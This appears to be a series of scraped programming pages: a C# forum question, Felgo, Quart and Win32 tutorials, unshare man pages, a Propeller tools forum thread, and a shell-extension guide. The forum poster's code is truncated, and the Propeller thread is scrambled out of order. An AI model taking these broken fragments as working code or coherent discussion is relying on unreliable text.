When I run the program it doesn't have errors, but it doesn't perform its function. When I type quit it says "you've entered quit minutes". I don't get it. ''' using System; namespace teamtreehouse1 { class MainClass { public static void Main(string[] args) { int runningTotal = 0; bool keepGoing = true; while(keepGoing) { // Prompt the user for minutes exercised Console.Write("Enter how many times the user quits } } Console.WriteLine("Goodbye"); } } } '''

Jon Wood 9,883 Points

Yep, the code looks good to me! :) When experimenting I either fire up Rider (no longer free for long, I believe) or just go to .NET Fiddle. They have better language support in terms of letting you know of compile errors as you're typing, and IntelliSense.

1 Answer

Steven Parker 179,649 Points

You must have been using different code. The code above is not capable of the behavior you describe.

Matthew Musni 610 Points

OK guys, I tried to create a new project in Xamarin Studio, then copied my code there and it worked! I don't know why, but it now works!
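The symptom described (typing quit is reported back as minutes) usually means the loop body never checks for the quit keyword before echoing the input. The shape below is a sketch of the general pattern such an exercise expects, not the poster's exact missing code; the prompt text and message wording are assumptions:

```csharp
using System;

class Program
{
    static void Main()
    {
        int runningTotal = 0;
        bool keepGoing = true;

        while (keepGoing)
        {
            // Prompt the user for minutes exercised
            Console.Write("Enter minutes exercised, or \"quit\" to exit: ");
            string entry = Console.ReadLine();

            if (entry.ToLower() == "quit")
            {
                // Leave the loop instead of treating "quit" as a number
                keepGoing = false;
            }
            else
            {
                int minutes = int.Parse(entry);
                runningTotal += minutes;
                Console.WriteLine("You've entered " + runningTotal + " minutes.");
            }
        }

        Console.WriteLine("Goodbye");
    }
}
```

The key point is that the quit check must run before the input is used as a number; if the branch is missing or unreachable, the raw string gets echoed straight into the output message.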
https://teamtreehouse.com/community/it-wont-work-it-doesnt-loop-whats-wrong
Check out this quick tour to find the best demos and examples for you, and to see how the Felgo SDK can help you to develop your next app or game! Felgo allows you to access various device sensors, with the Qt Sensors QML Types. Here is an example how to read from the Accelerometer sensor. You can tilt your phone forward and backward to see the value changing along the Y-axis: import Felgo 3.0 import QtQuick 2.0 import QtSensors 5.9 App { NavigationStack { Page { title: "Hello Felgo" AppText { anchors.verticalCenter: parent.verticalCenter text: "Accelerometer Y " + accelerometer.reading.y } Accelerometer { id: accelerometer active: true } } } }
https://felgo.com/doc/apps-howto-use-native-device-sensors/
Synchronous code will block the event loop and degrade the performance of the Quart application it is run in. This is because the synchronous code will block the task it is run in and in addition block the event loop. It is for this reason that synchronous code is best avoided, with asynchronous versions used in preference.

It is likely though that you will need to use a third party library that is synchronous, as there is no asynchronous version to use in its place. In this situation it is common to run the synchronous code in a thread pool executor so that it doesn't block the event loop and hence degrade the performance of the Quart application. This can be a bit tricky to do, so Quart provides some helpers.

Firstly any synchronous route will be run in an executor, i.e.

    @app.route("/")
    def sync():
        method = request.method
        ...

will result in the sync function being run in a thread. Note that you are still within the Contexts, and hence you can still access the request, current_app and other globals.

The following functionality accepts synchronous functions and will run them in a thread:

- Route handlers
- Endpoint handlers
- Error handlers
- Context processors
- Before request
- Before websocket
- Before first request
- Before serving
- After request
- After websocket
- After serving
- Teardown request
- Teardown websocket
- Teardown app context
- Open session
- Make null session
- Save session

Whilst you can access the request and other globals in synchronous routes, you will be unable to await coroutine functions. To work around this Quart provides run_sync() which can be used as so,

    @app.route("/")
    async def sync_within():
        data = await request.get_json()

        def sync_processor():
            # does something with data
            ...

        result = await run_sync(sync_processor)
        return result

this is similar to utilising the asyncio run_in_executor function,

    @app.route("/")
    async def sync_within():
        data = await request.get_json()

        def sync_processor():
            # does something with data
            ...
        result = await asyncio.get_running_loop().run_in_executor(
            None, sync_processor
        )
        return result

Note

The run_in_executor function does not copy the current context, whereas the run_sync method does. It is for this reason that the latter is recommended. Without the copied context the request and other globals will not be accessible.
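The difference in context handling can be illustrated with plain asyncio and contextvars. This sketch is not Quart's implementation; the ContextVar here merely stands in for Quart's request globals, to show why copying the context before handing work to a thread matters:

```python
import asyncio
import contextvars
from functools import partial

request_id = contextvars.ContextVar("request_id")

async def run_sync_with_context(func, *args):
    # Copy the caller's context and run the blocking function inside it
    # in the default thread pool executor. A bare run_in_executor call
    # would not copy the context, so request_id.get() would raise
    # LookupError inside the worker thread.
    loop = asyncio.get_running_loop()
    ctx = contextvars.copy_context()
    return await loop.run_in_executor(None, partial(ctx.run, func, *args))

def sync_processor():
    # Blocking code, but it can still read the context variable
    # set by the asynchronous caller.
    return request_id.get()

async def main():
    request_id.set("abc123")
    return await run_sync_with_context(sync_processor)

result = asyncio.run(main())
print(result)  # prints abc123
```

Because ThreadPoolExecutor.submit does not propagate contextvars on its own (unlike asyncio tasks), the explicit ctx.run wrapper is what keeps the caller's state visible to the synchronous function.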
https://pgjones.gitlab.io/quart/how_to_guides/sync_code.html
Win32 Under the Hood :: Sequel to

Let's pop the hood and see what makes Windows tick, while keeping things simple. At this point we will use the C language to look at examples; it's easier to follow for beginners than a bunch of C++ classes. The requirements are that you have a C/C++ compiler that supports 32-bit, and check to see you have a windows.h inside your include folder. Grab a copy of the win32.hlp file from Read this as your Bible to Win32. Refer to this always: if you don't know what a function does, or what its parameters are, or how to use it, look it up.

The first of your programs will always #include <windows.h>; this is what gives you access to the Win32 API. Some compilers may require a linker option.

#define WIN32_LEAN_AND_MEAN
#include <windows.h>

We define WIN32_LEAN_AND_MEAN because this will exclude extra header files that windows.h would normally include, as your first few Win32 programs will have no need for these extras. As your programs advance you will undoubtedly need to remove the offending line.

As most would be familiar, main() is the entry point for a DOS or console application. Native Win32 apps begin execution at WinMain. In DOS we passed command line arguments; these argv, I believe, were arguments passed to main(). In the case of Win32, Windows fills in the arguments to WinMain:

int WINAPI WinMain(HINSTANCE hInst, HINSTANCE hPrevInst, LPSTR lpCmdLine, int nShow);

First we gasp at WINAPI. This is a calling convention; basically it has to do with memory, the stack and how functions are called. This is the least of our worries. HINSTANCE and LPSTR may appear as new data types to you, however they are just aliases for standard C types:

typedef char * LPSTR
typedef void * HINSTANCE

They get included by windows.h. hInst is a pointer or handle to our executable. hPrevInst is no longer used; it's left over from 16-bit Windows. lpCmdLine is a command line; this is optional and adds functionality to your app.
nShow indicates to your application the way your window is supposed to start out: minimized, maximized... When you create a shortcut on your desktop, this is controlled in Properties. Windows takes care of filling in these parameters.

So now we need to do something with this knowledge. Well, let's start with an easy to use and understand function: MessageBox.

int WINAPI WinMain(HINSTANCE hInst, HINSTANCE hPrevInst, LPSTR lpCmdLine, int nShow){
    MessageBox(NULL, "This is a message box!", "Title", MB_OK);
    return 0;
}

The first argument is supposed to be a handle to our parent window, but we don't have one. Next is a pointer to a null-terminated string containing our message text, and another containing the title. MB_OK says we want an OK button in our message box. MB_OK is defined as a macro inside winuser.h, included by windows.h:

#define MB_OK 0x00000000L

If you compile, and you get no compiler or linker errors, you should see a nice message box.

Hardly "Under the hood" though is it? More like "Where to put the petrol in"

Slarty, very true, always have difficulties generating titles. Gonna lay off the Win32 tuts for a while, don't want to get carried away. Thanks BTW for helping to fill in more on the portability of Win32 in Linux for me in the other tut.
http://www.antionline.com/showthread.php?244804-Win32-Under-the-hood
Section (1) unshare

Name
unshare — run program with some namespaces unshared from parent

Synopsis
unshare [options] [program [arguments]]

DESCRIPTION
Unshares the indicated namespaces from the parent process and then executes the specified program. If program is not given, then "${SHELL}" is run (default: /bin/sh). The namespaces to be unshared are indicated via options. Namespaces are:

- mount namespace
Mounting and unmounting filesystems will not affect the rest of the system, except for filesystems which are explicitly marked as shared (with mount --make-shared; see /proc/self/mountinfo or findmnt -o+PROPAGATION for the shared flags). For further details, see mount_namespaces(7) and the discussion of the CLONE_NEWNS flag in clone(2). unshare since util-linux version 2.27 automatically sets propagation to private in a new mount namespace to make sure that the new namespace is really unshared. It's possible to disable this feature with option --propagation unchanged. Note that private is the kernel default.
- UTS namespace
Setting hostname or domainname will not affect the rest of the system. For further details, see namespaces(7) and the discussion of the CLONE_NEWUTS flag in clone(2).
- IPC namespace
The process will have an independent namespace for POSIX message queues as well as System V message queues, semaphore sets and shared memory segments. For further details, see namespaces(7) and the discussion of the CLONE_NEWIPC flag in clone(2).
- network namespace
The process will have independent IPv4 and IPv6 stacks, IP routing tables, firewall rules, the /proc/net and /sys/class/net directory trees, sockets, etc. For further details, see namespaces(7) and the discussion of the CLONE_NEWNET flag in clone(2).
- PID namespace
Children will have a distinct set of PID-to-process mappings from their parent. For further details, see pid_namespaces(7) and the discussion of the CLONE_NEWPID flag in clone(2).
- user namespace
The process will have a distinct set of UIDs, GIDs and capabilities. For further details, see user_namespaces(7) and the discussion of the CLONE_NEWUSER flag in clone(2).

OPTIONS
-i, --ipc[=file]
Unshare the IPC namespace. If file is specified, then a persistent namespace is created by a bind mount.
-m, --mount[=file]
Unshare the mount namespace. If file is specified, then a persistent namespace is created by a bind mount.

-n, --net[=file]
Unshare the network namespace. If file is specified, then a persistent namespace is created by a bind mount.

-p, --pid[=file]
Unshare the PID namespace. If file is specified, then a persistent namespace is created by a bind mount. See also the --fork and --mount-proc options.

-u, --uts[=file]
Unshare the UTS namespace. If file is specified, then a persistent namespace is created by a bind mount.

-U, --user[=file]
Unshare the user namespace. If file is specified, then a persistent namespace is created by a bind mount.

-C, --cgroup[=file]
Unshare the cgroup namespace. If file is specified, then a persistent namespace is created by a bind mount.

-f, --fork
Fork the specified program as a child process of unshare rather than running it directly. This is useful when creating a new PID namespace.

--kill-child[=signame]
When unshare terminates, have signame be sent to the forked child process. Combined with --pid this allows for an easy and reliable killing of the entire process tree below unshare. If not given, signame defaults to SIGKILL. This option implies --fork.

--mount-proc[=mountpoint]
Just before running the program, mount the proc filesystem at mountpoint (default is /proc). This is useful when creating a new PID namespace; it also implies creating a new mount namespace.

-r, --map-root-user
Run the program only after the current effective user and group IDs have been mapped to the superuser UID and GID in the newly created user namespace. This option implies --setgroups=deny.

--propagation private|shared|slave|unchanged
Recursively set the mount propagation flag in the new mount namespace. The default is to set the propagation to private. It is possible to disable this feature with the argument unchanged. The option is silently ignored when the mount namespace (--mount) is not requested.

--setgroups allow|deny
Allow or deny the setgroups(2) system call in a user namespace. The kernel gives permission to call setgroups(2) only after the GID map (/proc/pid/gid_map) has been set. The GID map is writable by root when setgroups(2) is enabled (i.e. allow, the default), and the GID map becomes writable by unprivileged processes when setgroups(2) is permanently disabled (with deny).

-V, --version
Display version information and exit.

-h, --help
Display help text and exit.

Section (2) unshare

Name
unshare — disassociate parts of the process execution context

Synopsis
#define _GNU_SOURCE
#include <sched.h>

int unshare(int flags);

DESCRIPTION
unshare() allows a process to disassociate parts of its execution context that are currently being shared with other processes. The flags argument is a bit mask that specifies which parts of the execution context should be unshared:

CLONE_FILES
Reverse the effect of the clone(2) CLONE_FILES flag.
Unshare the file descriptor table, so that the calling process no longer shares its file descriptors with any other process.

CLONE_FS
Reverse the effect of the clone(2) CLONE_FS flag. Unshare filesystem attributes, so that the calling process no longer shares its root directory, current directory, or umask attributes with any other process.

CLONE_NEWCGROUP (since Linux 4.6)
This flag has the same effect as the clone(2) CLONE_NEWCGROUP flag. Unshare the cgroup namespace. Use of CLONE_NEWCGROUP requires the CAP_SYS_ADMIN capability.

CLONE_NEWIPC (since Linux 2.6.19)
This flag has the same effect as the clone(2) CLONE_NEWIPC flag. Unshare the IPC namespace, so that the calling process has a private copy of the IPC namespace which is not shared with any other process. Specifying this flag automatically implies CLONE_SYSVSEM as well. Use of CLONE_NEWIPC requires the CAP_SYS_ADMIN capability.

CLONE_NEWNET (since Linux 2.6.24)
This flag has the same effect as the clone(2) CLONE_NEWNET flag. Unshare the network namespace, so that the calling process is moved into a new network namespace which is not shared with any previously existing process. Use of CLONE_NEWNET requires the CAP_SYS_ADMIN capability.

CLONE_NEWNS
This flag has the same effect as the clone(2) CLONE_NEWNS flag. Unshare the mount namespace, so that the calling process has a private copy of its namespace which is not shared with any other process. Specifying this flag automatically implies CLONE_FS as well. Use of CLONE_NEWNS requires the CAP_SYS_ADMIN capability. For further information, see mount_namespaces(7).

CLONE_NEWPID (since Linux 3.8)
This flag has the same effect as the clone(2) CLONE_NEWPID flag. Unshare the PID namespace, so that the calling process has a new PID namespace for its children which is not shared with any previously existing process. The calling process is not moved into the new namespace. The first child created by the calling process will have the process ID 1 and will assume the role of init(1) in the new namespace. CLONE_NEWPID automatically implies CLONE_THREAD as well. Use of CLONE_NEWPID requires the CAP_SYS_ADMIN capability. For further information, see pid_namespaces(7).
CLONE_NEWUSER (since Linux 3.8)
This flag has the same effect as the clone(2) CLONE_NEWUSER flag. Unshare the user namespace, so that the calling process is moved into a new user namespace which is not shared with any previously existing process. As with the child process created by clone(2) with the CLONE_NEWUSER flag, the caller obtains a full set of capabilities in the new namespace. CLONE_NEWUSER requires that the calling process is not threaded; specifying CLONE_NEWUSER automatically implies CLONE_THREAD. Since Linux 3.9, CLONE_NEWUSER also automatically implies CLONE_FS. For further information, see user_namespaces(7).

CLONE_NEWUTS (since Linux 2.6.19)
This flag has the same effect as the clone(2) CLONE_NEWUTS flag. Unshare the UTS namespace, so that the calling process has a private copy of the UTS namespace which is not shared with any other process. Use of CLONE_NEWUTS requires the CAP_SYS_ADMIN capability.

CLONE_SYSVSEM (since Linux 2.6.26)
This flag reverses the effect of the clone(2) CLONE_SYSVSEM flag. Unshare System V semaphore adjustment (semadj) values, so that the calling process has a new empty semadj list that is not shared with any other process. If this is the last process that has a reference to the process's current semadj list, then the adjustments of this list are applied to the corresponding semaphores, as described in semop(2).

If flags is specified as zero, then unshare() is a no-op; no changes are made to the calling process's execution context.

RETURN VALUE
On success, zero is returned. On failure, -1 is returned and errno is set to indicate the error.

ERRORS
- EINVAL An invalid bit was specified in flags.
- EINVAL CLONE_THREAD, CLONE_SIGHAND, or CLONE_VM was specified in flags, and the caller is multithreaded.
- EINVAL CLONE_NEWIPC was specified in flags, but the kernel was not configured with the CONFIG_SYSVIPC and CONFIG_IPC_NS options.
- EINVAL CLONE_NEWNET was specified in flags, but the kernel was not configured with the CONFIG_NET_NS option.
- EINVAL CLONE_NEWPID was specified in flags, but the kernel was not configured with the CONFIG_PID_NS option.
- EINVAL CLONE_NEWUSER was specified in flags, but the kernel was not configured with the CONFIG_USER_NS option.
- EINVAL CLONE_NEWUTS was specified in flags, but the kernel was not configured with the CONFIG_UTS_NS option.
- EINVAL CLONE_NEWPID was specified in flags, but the process has previously called unshare() with the CLONE_NEWPID flag.
- ENOMEM Cannot allocate sufficient memory to copy parts of caller's context that need to be unshared.
- ENOSPC (since Linux 3.7) CLONE_NEWPID was specified in flags, but the limit on the nesting depth of PID namespaces would have been exceeded; see pid_namespaces(7).
- ENOSPC (since Linux 4.9; beforehand EUSERS) CLONE_NEWUSER was specified in flags, and the creation of the new user namespace would have caused the limit defined by the corresponding file in /proc/sys/user to be exceeded. For further details, see namespaces(7).
- EPERM The calling process did not have the required privileges for this operation.
- EPERM CLONE_NEWUSER was specified in flags, but either the effective user ID or the effective group ID of the caller does not have a mapping in the parent namespace (see user_namespaces(7)).
- EPERM (since Linux 3.9) CLONE_NEWUSER was specified in flags and the caller is in a chroot environment (i.e., the caller's root directory does not match the root directory of the mount namespace in which it resides).
- EUSERS (from Linux 3.11 to Linux 4.8) CLONE_NEWUSER was specified in flags, and the limit on the number of nested user namespaces would be exceeded. See the discussion of the ENOSPC error above.

EXAMPLE
The program below provides a simple implementation of the unshare(1) command, which unshares one or more namespaces and executes the command supplied in its command-line arguments.

#define _GNU_SOURCE
#include <sched.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

/* A simple error-handling function: print an error message based
   on the value in 'errno' and terminate the calling process */

#define errExit(msg)    do { perror(msg); exit(EXIT_FAILURE); \
                        } while (0)

static void
usage(char *pname)
{
    fprintf(stderr, "Usage: %s [options] program [arg...]\n", pname);
    fprintf(stderr, "Options can be:\n");
    fprintf(stderr, "    -i   unshare IPC namespace\n");
    fprintf(stderr, "    -m   unshare mount namespace\n");
    fprintf(stderr, "    -n   unshare network namespace\n");
    fprintf(stderr, "    -p   unshare PID namespace\n");
    fprintf(stderr, "    -u   unshare UTS namespace\n");
    fprintf(stderr, "    -U   unshare user namespace\n");
    exit(EXIT_FAILURE);
}

int
main(int argc, char *argv[])
{
    int flags, opt;

    flags = 0;

    while ((opt = getopt(argc, argv, "imnpuU")) != -1) {
        switch (opt) {
        case 'i': flags |= CLONE_NEWIPC;    break;
        case 'm': flags |= CLONE_NEWNS;     break;
        case 'n': flags |= CLONE_NEWNET;    break;
        case 'p': flags |= CLONE_NEWPID;    break;
        case 'u': flags |= CLONE_NEWUTS;    break;
        case 'U': flags |= CLONE_NEWUSER;   break;
        default:  usage(argv[0]);
        }
    }

    if (optind >= argc)
        usage(argv[0]);

    if (unshare(flags) == -1)
        errExit("unshare");

    execvp(argv[optind], &argv[optind]);
    errExit("execvp");
}
https://manpages.net/detail.php?name=unshare
Edit: Version 0.16 - "@" (absolute hub address) operator corrected; object ordering bug
Edit: Version 0.17 - "@" disables duplicate object elimination

jac_goudsmit wrote: »
PropellerIDE is sort of a portable version of Propeller Tool but needs work, probably dormant, not dead (will hopefully get project files and C/C++ support added)

iseries wrote: »
I have been writing code for the propeller for several years now and only code in C or C++. I only use SimpleIDE.

#include <PropWare/PropWare.h>
#include <PropWare/gpio/pin.h>

using PropWare::Pin;
using PropWare::Port;

int main () {
    const Pin led1(Port::P17, Pin::Dir::OUT);
    led1.start_hardware_pwm(4); // This is in Hertz

    const Pin led2(Port::P16, Pin::Dir::OUT);
    while (1) {
        led2.toggle();
        waitcnt(CLKFREQ / 4 + CNT);
    }
}

        .section .text.startup.main,"ax",@progbits
        .balign 4
        .global _main
_main
        mov __TMP0,#(2<<4)+14
        call #__LMM_PUSHM
        mov r7, DIRA
        mvi r6,#131072
        or r7, r6
        mvi r14,#__clkfreq
        mov DIRA, r7
        mov r0, #0
        mov r1, #4
        mov r3, #0
        mov CTRA, #0
        rdlong r2, r14
        lcall #___udivdi3
        mov FRQA, r0
        mov PHSA, #0
        mvi r7,#.LC0
        mvi r6,#-65537
        rdlong CTRA, r7
        mov r7, DIRA
        and r7, r6
        mvi r6,#65536
        or r7, r6
        mov DIRA, r7
        jmp #__LMM_FCACHE_LOAD
        long .L4-.L3
.L3
.L2
        xor OUTA,r6
        mov r5, CNT
        rdlong r7, r14
        shr r7, #2
        add r7, r5
        waitcnt r7,#0
        jmp #__LMM_FCACHE_START+(.L2-.L3)
        jmp __LMM_RET
        .compress default
.L4
        .data
        .balign 4
.LC0
        long 268435456
        .section .text.startup.main

DavidZemon wrote: »
        mov r7, DIRA
        mvi r6,#131072
        or r7, r6
        ' compiler goes "squirrel!":
        mvi r14,#__clkfreq
        mov DIRA, r7

        or DIRA, mask
        ...
mask    long |< hw#pin_LED

void set_dir (const PropWare::Port::Dir direction) const {
    DIRA = (DIRA & ~(this->m_mask)) | (this->m_mask & static_cast<uint32_t>(direction));
}

Heater. wrote: »
In some situations changing the pin direction rapidly can be important.
It could be being used in a bidirectional fashion.

jac_goudsmit wrote: »
Heater. wrote: »
In some situations changing the pin direction rapidly can be important. It could be being used in a bidirectional fashion.

David Betz wrote: »
Ah, you must be talking about your L-Star Plus board. I'm just starting to assemble mine today. Very nice work!

iseries wrote: »
I don't follow. C code is faster than SPIN code, and if you don't like the C code you write assembly code. What's not to like here.

It does conditional compiles. Roy looks after OpenSpin. Hope this helps.

Prop OS (also see Sphinx, PropDos, PropCmd, Spinix) Website: Prop Tools (Index), Emulators (Index), ZiCog (Z80)

Probably have some more changes in the near future.

...and there is Homespun, an open sourced Spin compiler. Works a treat on Linux. I have never tried building it on a Windows machine. Or whatever features the Propeller Tool does not have. I pretty much gave up following SimpleIDE and PropellerIDE ages ago. They were so neglected and in disarray. Perhaps that has changed recently.

===Jac

The unused method/object elimination is more aggressive than BSTC's in most cases.

"@" = absolute byte address in HUB. The issue is that it has to work in context - as in, as part of an expression. Since you don't know the final location of a label in hub memory until after everything is compiled and linked together into the final binary, you then need to go back and fix up already compiled code with new data. That could possibly change the end result compiled size, which could move the address of the thing in hub memory.

The way Chip's compiler does things is not a typical parser/compiler setup. It's parsing and compiling as it goes. The passes aren't even clearly separate, since the 1st pass ends up being done twice for every file that includes other files (OBJs). It's all very different from how BSTC or Homespun or any of the others do it.

My questions?
===Jac

SimpleIDE is for students, PropellerIDE is for pros? SimpleIDE is for C/C++, PropellerIDE is for Spin and PBasic. Whether or not SimpleIDE can do Spin is rather irrelevant I think - it was never intended to be an IDE/editor for Spin-focused projects and therefore isn't very good at it. Pick the right tool for the job, and SimpleIDE isn't the right tool for a Spin-focused project. You might then follow this up with "so C/C++ is for students and Spin is for pros?" at which point I would vehemently say "NO" and point you to any number of language war threads that already exist on this forum, and someone else would undoubtedly reply with why C/C++ is a terrible fit and you should stick with Spin, and of course Peter would quickly follow up saying we're all dumb for not just using Tachyon. And he'd probably be right.

What's the future of SimpleIDE/PropellerIDE? I don't think either is "dead" in the sense that they have no users and fail to run on modern systems... but certainly neither has seen any updates in quite a while. PropellerIDE was forked from SimpleIDE and (after the fork) written almost entirely by another forum member named Brett. Though I believe Parallax contracted him for some of the work, much of it was volunteer and he's since had to find other, full-time work. Long story short, no one here is aware of any plans to make any changes to PropellerIDE for the foreseeable future. If Parallax has any such plans, they haven't announced them. No forum member has stepped up to take Brett's place, except for one person who has been making a few tweaks. Time will tell whether or not he continues his improvements and accepts the responsibility of maintainer or prefers to keep his footprint small.

SimpleIDE... oh there's a story there too. Parallax seems to be far more vested in that due to their push in the education market and the fact that they are pushing C, not Spin, in education.
That being said, we've seen only the most minimal of changes in SimpleIDE for the last few years. The key author, jazzed, did all the work under contract (I think??? I've never actually talked to him about that so I could be totally off base there), so the fact that we haven't seen any changes means Parallax cut off the money supply. We won't see any further work until Parallax deems it worthy/necessary. And just like PropellerIDE, I don't think there has been any public mention of future plans.

What's up with renamed libraries in PropellerIDE? I think that was Brett trying to refactor the libraries for better organization. It is indeed a breaking change, but I personally like the result a lot more. I hope you do too, after some adjustment period.

Compatibility of PASM/BSTC/OpenSpin? PASM issues in gas? gas is only available from PropGCC, none of the Spin compilers. On the other hand, (new versions of) PropGCC know how to compile PASM as well as gas. On the other hand, PropGCC uses a different binary output format. Basically... either write your code in Spin and pick any number of the Spin compilers (Parallax Propeller Tool, openspin, homespun, bstc, who knows what else) or write your code in C/C++ with PropGCC. There are ways to mix Spin and C/C++ too, but I don't think that's what you're asking about here. Ignore PASM from a requirements standpoint - both the Spin compilers and PropGCC will build your assembly code just fine.

IF you're on Linux and IF you like the command line and IF you like PropGCC, then we should chat about PropWare - I happen to think it's just dandy for that niche case.

1. SimpleIDE is for C more than anything, and PropellerIDE is for Spin and PropBasic. At least those are my understanding of the target usages.
2. I think active development on both of them is on hold or stopped.
3. PropellerIDE is meant to be an alternative to PropTool; its differences are mainly additional features. I don't really know specifics since I do not use it.
4.
No one is working on BSTC and it's closed source; no one is actively working on Homespun that I know of either. I will continue to support OpenSpin until the Prop dies or I die (whichever comes first).
5. I had not seen your issue submitted at the OpenSpin github, sorry about that. It doesn't seem to be emailing me notifications again. I replied over there, but your bug is not an OpenSpin one, it's a PropellerIDE one. OpenSpin does already search the current path for files before going to look in the passed in paths (the lib path is passed in).
6. I believe the "renamed" libraries in PropellerIDE are stuff to go with Lamestation? That was Brett's motivation for making/working on PropellerIDE. Again, I don't use it so I don't know the details.
7. OpenSpin, BSTC and the other Spin compilers should all be the same for Spin and PASM source code. Only the "gas" variant is different syntax, etc. for PASM. I'm also not aware of any cross language support being in any of the compilers. If you want to use PASM stuff with propgcc then you have to do the same stuff you've always had to do over there.

OpenSpin and BSTC do have a compile option for making a binary file of the DAT stuff, which can then be used with propgcc somehow. Forgot to mention it in my previous reply.

From bottom up... gas: the syntax and usage of GAS is different and a direct copy of PASM is not there. Thus the trick using binary blobs.

PropellerIDE is made by Brent for his own Game-Development System and he renamed the libraries to fit his purpose. This is not a Parallax product. It does Spin/PASM, but not C/C++.

SimpleIDE is made by @Jazzed with some support from Parallax and mainly made for C development. Spin support was added later, as well as support for Basic. This is somehow a Parallax product, but mainly for C and Blockly.

I never had that library issue; I mainly use the PropTool and there the current directory is searched first, then the library folder.
Should be the same for OpenSpin, worked for me fine.

BST is also not a Parallax project; as far as I remember Brad stopped working on it because of no support/interest from Parallax to work on it. Consider it dead. Same goes for Homespun, no further development as far as I know. Consider it dead.

PropellerIDE is made by Brent, now back at a fulltime job. He will/may do some more but no timeframe. Consider it as not dead yet, but on hold.

SimpleIDE is under development at Parallax, mainly used for Blockly and will be supported, but development somehow stopped while waiting for the P2.

OpenSpin is made by Roy but for Parallax; this is somehow a Parallax product and actively supported by Roy. It will also grow into the P2 Spin compiler as Roy stated.

SimpleIDE is mainly for C (thus the project files). PropellerIDE is open source and both run on Windows, Linux and some Macs. PropTool is Windows only and has not been changed for a while now.

My personal feeling here is that @Ken is busy getting Blockly into the education market to finance @Chip's P2, all Parallax developers are working on Blockly, and everything else like PropGCC, SimpleIDE, a new PropTool or whatever else is on hold until the P2 is done and in production. Then there will be a furious push to get the software tools done, to have something when the chips finally arrive.
Perhaps we should open up an experimental/development branch of PropellerIDE on GitHub with these changes and have forum folks test on the variety of systems? This, only on Parallax's approval!

dgately

Works great and gets the job done. I am able to build libraries and functions with no issues. I find most of the time assembly code is not necessary, as the C code generates the same code and works just fine. Look at hacking the Parallax badge, which is all in C code.

Mike
Anyway, eventually I want to try and explain how things in my project work by using C. And I'll use either SimpleIDE or PropWare (I haven't had a chance to try that yet) to do that. It'll just run slower than the Assembly code. I think my target audience would be willing to read the Assembly source code and they would understand it if they already know what the corresponding C code looks like. But I don't want to ask readers to take a jump from "This is how it works in C" to "This is how it works in assembler and oh by the way you have to convert the higher level stuff from C to Spin to make the PASM parts work". That would just be silly. So I'll probably have to deal with whatever incompatibilities are left in gas. Or now that it's in Github, I might fork GCC/binutils/gas to make it work the way I think it's supposed to. Maybe I can even convince some people that my ideas in that old thread were not so bad after all. At this time, I'm not yet angry enough at the mess to attack it :-) ===Jac Here's an example of what "modern" PropGCC will do when combined with (good) C++: My C++ example for blinking a GPIO (docs on this example here:) And the generated assembly: That's exactly what I mean with "too much juggling". Your constructor code for the Pin class probably just has something similar to "DIRA |= 1 << pinnum;" In assembler, I would just write this as: That is a 4x speed up, and saves 3 longs. Or a 5x speed up if you count the extra instruction that the compiler generates because it somehow thinks it's a good idea to get ahead of itself. And actually it's worse than that because you're compiling in LMM mode. I have great respect and admiration for the engineers that made gcc work for the Propeller. But there is a lot of room for improvement. ===Jac When PropGCC was first implemented we had the COG and LMM models. The hub memory issue became a major problem, so the XMM and XMMC models were added. 
Finally, the CMM model was added, which uses about the same amount of memory as Spin, and typically runs slightly faster. The P2 should be a joy to program in C or C++. With 512K of hub RAM we won't have to struggle so much with running out of memory.

This code is used for both ports (multi pin, not consecutive) and individual pins. You'll notice the part where performance matters - the toggle - is nice and fast.

Absolutely. And in those scenarios, PropWare::Pin::set_direction would not be appropriate. But of course there are many ways to solve that problem with PropGCC as the build tool of choice. What's not to like here.

Mike

Thanks! I'm working on documentation this weekend.

===Jac

C may be faster than Spin but assembler is even faster. As I already mentioned, some of my code has to do its job in loops that take 1 microsecond. That usually comes down to about 15 or 16 regular instructions, plus one or two waitpxx instructions, plus one hub instruction. That leaves me no playing room to let the C compiler insert instructions like it does in that code fragment above. Therefore I said: C is great but could be greater, and for at least some parts of my software it's simply not good enough.

===Jac
https://forums.parallax.com/discussion/168321/migrating-from-propeller-tool-to-propelleride-or-simpleide
In Parts I and II of the Guide, I showed how to write context menu extensions that are invoked when the user right-clicks on certain types of files. In this part, I'll demonstrate a different type of context menu extension, the drag and drop handler, which adds items to the context menu displayed for a right-button drag and drop operation. I'll also give more examples of using MFC in an extension. Part IV assumes that you understand the basics of shell extensions, and are familiar with MFC. This particular extension is a real utility that creates hard links on Windows 2000 and later, but you can still follow along even if you are using an older version of Windows. As every power user knows (and few normal users know), you can drag and drop items in Explorer using the right mouse button. When you release the button, Explorer shows a context menu that lists all the available actions you can take. Normally, these are move, copy, and create shortcut: Explorer lets us add items to this menu, by using a drag and drop handler. This type of extension is invoked when any right-drag and drop operation happens, and the extension can add menu items if it deems it should. An example of a drag and drop handler is in WinZip. Here's what WinZip adds to the context menu when you right-drag a compressed file: WinZip's extension is invoked for any right-drag and drop operation, but it only adds its menu items if a compressed file is being dragged. This article's sample extension will use an API added in Windows 2000, CreateHardLink(), to make hard links to files on NTFS volumes. We'll add an item for making links to the context menu, so the user can make hard links the same way as regular shortcuts. Remember that VC 7 (and probably VC 8) users will need to change some settings before compiling. See the README section in Part I for the details. Run the AppWizard and make a new ATL COM app. We'll call it HardLink.
We are going to use MFC, so check the Support MFC checkbox, and then click Finish. To add a COM object to the DLL, go to the ClassView tree, right-click the HardLink classes item, and pick New ATL Object. (In VC 7, right-click the item and pick Add|Add Class.) As before, choose Simple Object in the wizard, and use the name HardLinkShlExt for the object. This will create a C++ class CHardLinkShlExt that will implement the extension. As with our earlier context menu extensions, Explorer initializes us using the IShellExtInit interface. We first need to add IShellExtInit to the list of interfaces that CHardLinkShlExt implements. Open HardLinkShlExt.h, and add the lines listed here in bold:

#include <comdef.h>
#include <shlobj.h>

class CHardLinkShlExt :
    public CComObjectRootEx<CComSingleThreadModel>,
    public CComCoClass<CHardLinkShlExt, &CLSID_HardLinkShlExt>,
    public IShellExtInit
{
BEGIN_COM_MAP(CHardLinkShlExt)
    COM_INTERFACE_ENTRY(IShellExtInit)
END_COM_MAP()

public:
    // IShellExtInit
    STDMETHODIMP Initialize(LPCITEMIDLIST, LPDATAOBJECT, HKEY);

We'll also need some variables to hold a bitmap and the names of the files being dragged:

protected:
    CBitmap     m_bitmap;
    TCHAR       m_szFolderDroppedIn[MAX_PATH];
    CStringList m_lsDroppedFiles;

